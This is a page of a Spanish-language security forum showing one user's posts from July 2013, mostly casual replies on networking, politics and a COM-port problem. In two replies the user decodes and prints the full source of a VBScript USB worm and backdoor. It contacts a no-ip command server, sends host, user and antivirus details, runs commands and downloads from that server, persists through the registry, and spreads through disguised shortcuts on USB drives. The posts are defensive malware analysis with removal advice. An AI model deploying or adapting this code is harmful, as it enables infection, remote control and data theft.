elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 1640 1641 1642 1643 1644 1645 1646 1647 1648 1649 1650 1651 1652 1653 1654 [1655] 1656 1657 1658 1659 1660 1661 1662 1663 1664 1665 1666 1667 1668 1669 1670 ... 1750
16541  Seguridad Informática / Hacking / Re: Ayuda con defacing en: 16 Julio 2013, 09:26 am
Citar
eh praticado haciendo defacing a pagina que se saben que son vulnerables

si las consiguió como paginas vulnerables en google supongo que son de practica XD si no, pobres dueños a los que les consigues paginas tan vulnerables que el mismo fb te dice XD

confío en que deben ser paginas de practica :P pero no te ayudo porque no se XD
16542  Seguridad Informática / Seguridad / Re: Ayuda!!! en: 16 Julio 2013, 09:23 am
antes de continuar solo quiero aclarar NO ENTREN A LA PAGINA! no saben que los espera ahí... yo no entré...

acabo de ver algo util...

Código
  1. uninstall
  2. on error resume next
  3. dim filename shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  4. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  5. filesystemobj.deletefile startup & installname ,true
  6. filesystemobj.deletefile wscript.scriptfullname ,true
  7. for each drive in filesystemobj.drives
  8. if drive.isready = true then
  9.  if drive.freespace > 0 then
  10.   if drive.drivetype = 1 then
  11.    for each file in filesystemobj.getfolder ( drive.path & "\").files
  12.     on error resume next
  13.     if instr (file.name,".") then
  14.      if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  15.       file.attributes = 0
  16.       if ucase (file.name) <> ucase (installname) then
  17.        filename = split(file.name,".")
  18.        filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  19.       else
  20.        filesystemobj.deletefile (drive.path & "\" & file.name)
  21.       end if
  22.      end if
  23.     end if  
  24.    next
  25.   end if
  26.  end if
  27. end if
  28. next
  29. wscript.quit
  30. end sub

si alguien conoce al que hizo el virus díganle que me da asquito y grima como codéa a ver si estudia algo sobre "ser practico"

puedes intentar hacer esos pasos a mano para borrarlo (no aseguro nada, capaz es una trampa XD yo jamás le pondría rutina de "desinstalar" a un malware... pero videndo lo patético que es el codigo... es posible que si sirva XD)

por cierto, reporta a no-ip la direccion para que la canccelen a

abuse@no-ip.com

mandales el codigo del virus
16543  Seguridad Informática / Seguridad / Re: Ayuda!!! en: 16 Julio 2013, 09:13 am
basicamente todo el codigo es para descifrar esa cadena larga... que al traducirla queda

Código
  1. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=
  2.  
  3. host = "basss.no-ip.info"
  4. port = 87
  5. installdir = "%temp%" '
  6.  
  7. <[ coded by nj ]> | <[ modifier : houdini ]>
  8. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=
  9. dim shellobj
  10. set shellobj = wscript.createobject("wscript.shell")
  11. dim filesystemobj
  12. set filesystemobj = createobject("scripting.filesystemobject")
  13. dim httpobj
  14. set httpobj = createobject("msxml2.xmlhttp")
  15.  
  16. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  17. installname = wscript.scriptname
  18. startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then
  19. installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<|>"
  20. sleep = 5000
  21. dim response
  22. dim cmd
  23. dim param info = ""
  24. usbspreading = ""
  25. dim oneonce
  26.  
  27. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  28. on error resume
  29. next instance
  30.  
  31. while true
  32. install response = ""
  33. response = post ("is-ready","")
  34. cmd = split (response,spliter)
  35. select case cmd (0)
  36. case "excecute"
  37. param = cmd (1)
  38. execute param
  39. case "update"
  40. param = cmd (1)
  41. oneonce.close
  42. set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
  43. oneonce.write
  44. param
  45. oneonce.close
  46. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit
  47. case "uninstall"
  48. uninstall
  49. Case "send"
  50. param = cmd (1)
  51. download (param)
  52. end select
  53.  
  54. wscript.sleep
  55. sleep wendsub
  56.  
  57. install
  58. on error resume next
  59. dim lnkobj
  60. dim filename
  61. dim fileicon upstart
  62. for each drive in filesystemobj.drives
  63. if drive.isready = true then if drive.freespace > 0
  64. then if drive.drivetype = 1 then filesystemobj.copyfile
  65.  
  66. wscript.scriptfullname , drive.path & "\" & installname,true if filesystemobj.fileexists (drive.path & "\" & installname)
  67. then filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
  68. end if
  69.  
  70. for each file in filesystemobj.getfolder( drive.path & "\" ).files
  71. if instr (file.name,".") then
  72. if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk"
  73. then file.attributes = 2+4
  74. if ucase (file.name) <> ucase (installname)
  75. then filename = split(file.name,".")
  76. set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk") lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 then lnkobj.iconlocation = file.path else lnkobj.iconlocation = fileicon end if lnkobj.save() end if end if end if next end If end If end if next err.clear end sub sub uninstall on error resume next dim filename shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then for each file in filesystemobj.getfolder ( drive.path & "\").files on error resume next if instr (file.name,".") then if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 0 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" ) else filesystemobj.deletefile (drive.path & "\" & file.name) end if end if end if next end if end if end if next wscript.quit end sub function post (cmd ,param) post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end function function information on error resume next if inf = "" then inf = hwid & spliter inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set os = root.execquery ("select * from win32_operatingsystem") for each osinfo in os inf = inf & osinfo.caption & spliter exit for next inf = inf & "underworld final" & spliter inf = inf & security & spliter inf = inf & usbspreading information = inf else information = inf end if end function sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub function hwid on error resume next set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disks if disk.volumeserialnumber <> "" then hwid = disk.volumeserialnumber exit for end if next end function function security on error resume next security = "" set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitems versionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for x = 1 to ubound (versionstr) osversion = osversion & versionstr (i) next osversion = eval (osversion) if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter" set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0) for each objantivirus in colantivirus security = security & objantivirus.displayname & " ." next if security = "" then security = "nan-av" end function function instance on error resume next usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") if usbspreading = "" then if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then usbspreading = "true" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" else usbspreading = "false" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" end if end if upstart set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort = filesystemobj.getfile (installdir & installname) if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if err.number > 0 then wscript.quit end function function download (fileurl) strsaveto = installdir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send "" set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists (strsaveto) then shellobj.exec strsaveto end if end function


uds terminen de arreglar el codigo... es muy largo... yo recomiendo descargar un linux portable, limpiar el pendrive y formatear... eso se ve feo y está incluso enviando informacion a quien sabe donde... (bueno en realidad si sabemos donde host = "basss.no-ip.info" port = 87) sube ese codigo a virus total para que quede reportado y bueno... limpiar pendrive con un live de linux y formatear...
16544  Comunicaciones / Redes / Re: Cual es mi proveedor real de Internet? en: 16 Julio 2013, 08:56 am
exacto... esa empresa es el "dueño" del rango donde pertenece tu ip...

solo consigo

http://www.cabase.org.ar/wordpress/nss-sa-iplan/

que lleva a
http://iplan.com.ar/

no se cual sea la probabilidad de contratar más plan para ti solo, pero posiblemente es un poco complicado, ya que por lo que veo iplan es una empresa que subcontrata redes a PyMEs (pequeña y mediana empresa) habla con tu vecino para ver que puedes hacer, si no llama a iplan a averiguar como es el asunto, cuanto sale, etc... (tal vez pases 20min al telefono, asi que tiempo y calma) 
16545  Foros Generales / Foro Libre / Re: Edward Snowden ¿Prision o Libertad? ¿Cual es tu opinion? ¿Cual es tu voto? en: 16 Julio 2013, 05:37 am
yo voto por prisión... lo que hizo fue correcto? si! pero... lo que hizo fue un crimen? si... lamentablemente el es una persona que como cualquier otra cometió un crimen... que fue en pro del bien de la humanidad? si, entonces revisemos la ley de EEUU a ver que atenuantes tiene "cometer un crimen para salvar al mundo" creo en la ley y en el  sistema, creo que si a la gente no lo gusta esa ley debería levantarse y actuar para acabar con las represiones y dictaduras! que eeuu está cometiendo acciones ilegales, si!, debe ser juzgado por eso? si!


dura lex sed led
16546  Programación / Desarrollo Web / Re: Eliminar elementos de html antes de cargar en: 16 Julio 2013, 05:31 am
que tal si haces lo contrario, solo si es pc, un script en js la crea y carga?
16547  Foros Generales / Dudas Generales / Re: (Duda) ¿Donde aprender ingles? en: 16 Julio 2013, 05:09 am
es una duda general XD
16548  Sistemas Operativos / Windows / Re: problema con puertos COM, bloqueados? en: 16 Julio 2013, 05:08 am
actualizacion... sigo con el problema :s no consigo solucion al "puerto com3 está siendo usado" estoy seguro que es la pc, porque la tablet android me lee perfectamente los datos del arduino... la pc, ni por hyperterminal, ni nada los lee (incluso el arduino asume que no hay nada conectado y no intenta comunicarse casi nunca... unas pocas veces responde, pero son muy puntuales, en cambio, con la tablet conecto e inmediatamente empieza a transmitir... ya había usado hyperterm antes y en otras pc ha funcionado bien, está comunicándose 100 veces por segundo) no se que los bloquea... intenté con el process explorer, nada... que recomiendan?
16549  Seguridad Informática / Hacking / Re: [Hacking] Router que usa linux. en: 15 Julio 2013, 21:18 pm
ssh, dhcp = servicios XD cualquier cosita basicamente...


si se te hace canson copiar todo has un programa en c++, bash, lo que sepas usar que lo haga solo...


16550  Foros Generales / Foro Libre / Re: Avion de Evo Morales en: 15 Julio 2013, 09:40 am
yo me hubiera quedado encerradito en mi avion atravesado en una pista de aterrizaje esperando que los presidentes de argentina, Venezuela y ecuador llegaran y que quemaran las embajas en cada uno de esos paises XD

los presidentes tienen total y absoluta inmunidad diplomatica...
Páginas: 1 ... 1640 1641 1642 1643 1644 1645 1646 1647 1648 1649 1650 1651 1652 1653 1654 [1655] 1656 1657 1658 1659 1660 1661 1662 1663 1664 1665 1666 1667 1668 1669 1670 ... 1750
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines